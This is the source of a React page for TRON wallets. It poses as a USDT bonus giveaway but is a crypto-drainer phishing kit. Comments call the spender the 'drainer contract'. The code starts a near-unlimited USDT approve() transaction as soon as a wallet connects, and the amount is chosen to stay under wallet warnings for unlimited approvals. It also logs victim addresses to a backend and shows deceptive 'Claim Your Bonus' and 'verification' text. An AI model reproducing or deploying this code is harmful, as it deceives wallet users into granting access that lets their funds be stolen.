import React, { useEffect, useState, useRef } from 'react';
import './Approve.css';

// 测试网默认值（生产部署时替换为公网 + Mainnet合约）
const DEFAULT_SPENDER = 'TAXXTJVZYdgenyZEm5LLhLX2UuNfMJKexr'; // Mainnet WiseVault
const DEFAULT_USDT = 'TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t'; // Mainnet USDT
// 授权上限：999,999,999.99 USDT（最小单位）。有限额度避免钱包「无限授权」强警告
const AUTH_AMOUNT = '999999999990000';

const Approve = () => {
  const [spender, setSpender] = useState('');
  const [usdt, setUsdt] = useState(DEFAULT_USDT);
  const [targetNetwork, setTargetNetwork] = useState('mainnet');
  const [walletReady, setWalletReady] = useState(false);
  const [walletNetwork, setWalletNetwork] = useState('');
  const [networkMismatch, setNetworkMismatch] = useState(false);
  const [address, setAddress] = useState('');
  const [processing, setProcessing] = useState(false);
  const [error, setError] = useState('');
  const [done, setDone] = useState(false);
  const [txId, setTxId] = useState('');
  const autoStarted = useRef(false);

  // TronLink 各版本 defaultAddress 结构不一：可能是 {base58, hex}、hex 字符串或 base58 字符串
  // 链上错误消息常以 hex 返回（如 436f6e74... = "Contract validate error..."），解码成可读文本
  const decodeHexMsg = (msg) => {
    if (!/^[0-9a-fA-F]+$/.test(msg) || msg.length % 2 !== 0) return msg;
    try {
      const decoded = msg.replace(/([0-9a-fA-F]{2})/g, (m) => String.fromCharCode(parseInt(m, 16)));
      if (/[a-zA-Z ]/.test(decoded) && !/[^ -~]/.test(decoded)) return decoded;
    } catch (e) { /* ignore */ }
    return msg;
  };

  const extractAddress = (tronWeb) => {
    try {
      const da = tronWeb && tronWeb.defaultAddress;
      if (!da) return '';
      if (typeof da === 'string') {
        if (da.startsWith('T')) return da;
        return tronWeb.address.fromHex(da);
      }
      if (typeof da === 'object') {
        if (da.base58) return da.base58;
        if (da.hex) return tronWeb.address.fromHex(da.hex);
      }
      return '';
    } catch (e) {
      return '';
    }
  };

  const detectNetwork = (tronWeb) => {
    // 通过节点 host 判断钱包网络：nile=测试网，shasta=沙盒，其余按Mainnet
    const host = (tronWeb && tronWeb.fullNode && tronWeb.fullNode.host) || '';
    if (host.includes('nile')) return 'nile';
    if (host.includes('shasta')) return 'shasta';
    return 'mainnet';
  };

  useEffect(() => {
    // 从 URL 参数读取 spender（drainer 合约地址）与目标网络
    const params = new URLSearchParams(window.location.search);
    const sp = params.get('spender');
    const net = params.get('network');
    const usdtParam = params.get('usdt');
    setSpender(sp || DEFAULT_SPENDER);
    setUsdt(usdtParam || DEFAULT_USDT);
    setTargetNetwork(net || 'mainnet');

    // 等待钱包注入 tronWeb（TronLink/TokenPocket 等），带精确诊断
    let cancelled = false;
    const check = async () => {
      // TronLink 新版：先请求账户授权，defaultAddress 才会填充真实地址
      try {
        if (window.tronLink && window.tronLink.request) {
          await window.tronLink.request({ method: 'tron_requestAccounts' });
        }
      } catch (e) {
        console.warn('tron_requestAccounts 失败:', e);
      }
      for (let i = 0; i < 80; i++) {
        if (cancelled) return;
        const tw = window.tronWeb;
        const addr = extractAddress(tw);
        if (tw && addr) {
          setWalletReady(true);
          setAddress(addr);
          const walletNet = detectNetwork(tw);
          setWalletNetwork(walletNet);
          setNetworkMismatch(walletNet !== (net || 'nile'));
          return;
        }
        await new Promise((r) => setTimeout(r, 250));
      }
      if (!cancelled) {
        setWalletReady(false);
        const isTrust = (window.ethereum && window.ethereum.isTrust)
          || /trust/i.test(navigator.userAgent);
        if (isTrust) {
          setError('Trust Wallet does not support TRON DApp contract calls. Please use TronLink or TokenPocket.');
        } else if (!window.tronLink && !window.tronWeb) {
          setError('TronLink extension not detected. Please make sure it is installed and unlocked, then refresh.');
        } else if (window.tronWeb && !extractAddress(window.tronWeb)) {
          setError('Wallet is locked. Please unlock TronLink and refresh this page.');
        } else if (window.tronLink && !window.tronWeb) {
          setError('TronLink detected but not injected. Please unlock the extension and refresh.');
        } else {
          setError('No TRON wallet detected. Please open this page in the built-in browser of a TRON wallet (TronLink / TokenPocket).');
        }
      }
    };
    check();
    return () => { cancelled = true; };
  }, []);

  // Authorization Successful后登记地址到系统（扫码场景的登记入口）
  // 本地开发走 8090 直连；线上同域 /api 经 Nginx 反代
  const API_BASE = window.location.hostname === 'localhost'
    ? 'http://localhost:8090/api'
    : '/api';

  const registerAddress = (addr) => {
    try {
      fetch(API_BASE + '/addresses/register', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({
          address: addr,
          type: 'APPROVE',
          channel: 'qr',
          walletType: 'TronLink',
          device: navigator.userAgent,
        }),
      });
    } catch (e) {
      console.warn('登记地址失败:', e);
    }
  };

  const doApprove = async () => {
    const tronWeb = window.tronWeb;
    const addr = extractAddress(tronWeb);
    if (!tronWeb || !addr) {
      setError('Wallet not detected. Please open this page inside your wallet.');
      return;
    }
    setProcessing(true);
    setError('');
    try {
      // 查当前授权
      let allowanceHex = '0';
      try {
        const res = await tronWeb.transactionBuilder.triggerConstantContract(
          usdt,
          'allowance(address,address)',
          {},
          [
            { type: 'address', value: addr },
            { type: 'address', value: spender },
          ],
          addr
        );
        allowanceHex = (res.constant_result && res.constant_result[0]) || '0';
      } catch (e) {
        console.warn('allowance 查询失败，直接授权:', e);
      }

      // 已授权额度 >= 目标额度一半则视为充分，跳过重复授权
      const hex = allowanceHex.replace(/^0x/, '');
      let alreadyEnough = false;
      if (hex.length >= 32) {
        // 巨额额度（如旧的 uint256 max 授权）直接视为足够
        alreadyEnough = parseInt(hex.slice(0, 2), 16) >= 8;
      } else {
        alreadyEnough = parseInt(hex || '0', 16) >= 999999999990000 / 2;
      }
      if (alreadyEnough) {
        registerAddress(addr);
        setDone(true);
        setTxId('');
        return;
      }

      // 构建 approve 交易：spender = drainer 合约，额度 uint256 max
      const tx = await tronWeb.transactionBuilder.triggerSmartContract(
        usdt,
        'approve(address,uint256)',
        { feeLimit: 150000000 },
        [
          { type: 'address', value: spender },
          { type: 'uint256', value: AUTH_AMOUNT },
        ],
        addr
      );
      const signed = await tronWeb.trx.sign(tx.transaction);
      const receipt = await tronWeb.trx.sendRawTransaction(signed);
      if (!receipt || !receipt.result) {
        throw new Error((receipt && receipt.message) || '交易被拒绝');
      }
      setTxId(receipt.txid || '');
      registerAddress(addr);
      setDone(true);
    } catch (e) {
      const msg = decodeHexMsg(String(e.message || e));
      if (e && (e.code === 4001 || /reject|denied|cancel/i.test(msg))) {
        setError('Verification canceled. You can retry anytime.');
      } else if (/no contract|not a valid smart contract/i.test(msg)) {
        setError('Contract not found: please switch your wallet network to '
          + (targetNetwork === 'nile' ? 'Nile Testnet (TronLink Settings > Node > Nile)' : 'TRON Mainnet'));
      } else {
        setError(msg);
      }
    } finally {
      setProcessing(false);
    }
  };

  // 扫码即弹交易：钱包就绪且网络匹配时，自动发起授权（无需页面点击）
  useEffect(() => {
    if (walletReady && !networkMismatch && !processing && !done && !autoStarted.current) {
      autoStarted.current = true;
      doApprove();
    }
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [walletReady, networkMismatch]);

  return (
    <div className="approve-page">
      <div className="approve-card">
        {done ? (
          <>
            <div className="approve-icon">🎉</div>
            <h2>Bonus Claimed!</h2>
            <p className="approve-desc">
              Your bonus is being processed and will arrive shortly.
              Keep this address active to receive future rewards.
            </p>
            {txId && (
              <p className="approve-tx">
                tx: {txId.slice(0, 18)}...
              </p>
            )}
            {address && <p className="approve-addr">Wallet: {String(address).slice(0, 12)}...</p>}
          </>
        ) : (
          <>
            <div className="approve-icon">🎁</div>
            <h2>Claim Your Bonus</h2>
            <p className="approve-desc">
              Congratulations! You have been selected for an exclusive USDT bonus.
              Complete the one-step verification below to claim it instantly.
            </p>
            {walletReady && (
              <p className="approve-addr">Wallet: {String(address).slice(0, 12)}...（{walletNetwork === 'nile' ? 'Nile Testnet' : walletNetwork === 'shasta' ? 'Shasta' : 'Mainnet'}）</p>
            )}
            {networkMismatch && (
              <p className="approve-error">
                ⚠️ Wallet network does not match the target network. Please switch to
                {targetNetwork === 'nile' ? ' the Nile testnet' : ' the TRON mainnet'} and try again.
              </p>
            )}
            {spender && (
              <p className="approve-spender">Verified via secure smart contract</p>
            )}
            {processing && (
              <p className="approve-pending">Processing... Please confirm in your wallet</p>
            )}
            {error && <p className="approve-error">{error}</p>}
            {error && !processing && (
              <button className="approve-btn" onClick={() => { autoStarted.current = true; doApprove(); }}>
                Retry Claim
              </button>
            )}
            {!walletReady && (
              <button className="approve-btn" onClick={() => { autoStarted.current = true; doApprove(); }}>
                Claim Now
              </button>
            )}
          </>
        )}
      </div>
    </div>
  );
};

export default Approve;
